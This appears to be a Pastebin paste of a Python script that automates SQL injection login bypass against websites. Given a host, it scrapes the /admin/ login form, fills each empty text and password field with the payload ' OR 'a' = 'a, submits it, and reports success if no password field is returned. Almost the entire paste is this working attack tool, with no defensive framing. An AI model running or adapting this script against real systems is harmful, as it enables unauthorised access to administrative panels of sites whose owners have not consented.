Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3
- import requests
- from bs4 import BeautifulSoup
- import sys
- PSWD = "' OR 'a' = 'a"
- #PSWD = '1'
- def format_host(host):
- host = host.strip()
- ind = host.find('://')
- if ind != -1:
- host = host[ind + 3:]
- slash_ind = host.find('/')
- if slash_ind != -1:
- host = host[:slash_ind]
- return host
- def create_headers(host):
- if host[0:7] == 'http://':
- host = host[7:]
- if host[0:8] == 'https://':
- host = host[8:]
- headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US,en;q=0.8,ka;q=0.6', 'Cache-Control':'max-age=0', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'User-Agent':"""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36""", 'Upgrade-Insecure-Requests': '1'}
- return headers
- def get_form(host):
- url = host + '/admin/'
- s = requests.Session()
- resp = s.get(url, headers = create_headers(host))
- # print(resp.content)
- soap = BeautifulSoup(resp.content)
- forms = soap.find_all('form');
- filtered = []
- for f in forms:
- if len(forms) == 1:
- break
- attr = f.attrs.get('method')
- if attr != 'post' and attr != 'POST':
- continue
- filtered.append(f)
- form = max(forms, key=len)
- return form
- def get_action(form):
- attr = form.attrs.get('action')
- if not attr:
- print('get action')
- print('unknown')
- exit(0)
- return attr
- def gen_user_data(form):
- inputs = form.find_all('input')
- res = {}
- for inp in inputs:
- name = inp.attrs.get('name')
- if not name:
- continue
- val = inp.attrs.get('value')
- res[name] = val
- if val and len(val) > 0:
- continue
- tp = inp.attrs.get('type')
- if tp and len(tp) > 0 and tp != 'text' and tp != 'password':
- continue
- res[name] = PSWD
- return res
- def run(host):
- if host[len(host) - 1] == '/':
- host = host[:-1]
- if host.find('http://') == -1 and host.find('https://') == -1:
- host = 'http://' + host
- form = get_form(host);
- action = get_action(form)
- # print(form)
- gen_user_data(form)
- # exit()
- url = host + '/admin/' + action
- if action[0:7] == 'http://' or action[0:8] == 'https://':
- url = action
- s = requests.Session()
- login_url = url
- userdata = gen_user_data(form)
- headers = create_headers(host)
- res = s.post(login_url, data=userdata, headers=headers)
- if res.status_code >= 400:
- print('failure')
- exit()
- # print(res.content)
- # print(res.content)
- # print(res.cookies)
- # print(dir(res))
- # print(res.url)
- # print(res.status_code)
- content = res.content.decode('latin')
- print(res.url)
- print(content)
- if content.find('type="password"') != -1 or content.find("type='password'") != -1:
- print('failure')
- else:
- print('success')
- if __name__ == '__main__':
- if len(sys.argv) < 2:
- print('Usage: %s host' % sys.argv[0])
- exit(0)
- host = sys.argv[1]
- run(host)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement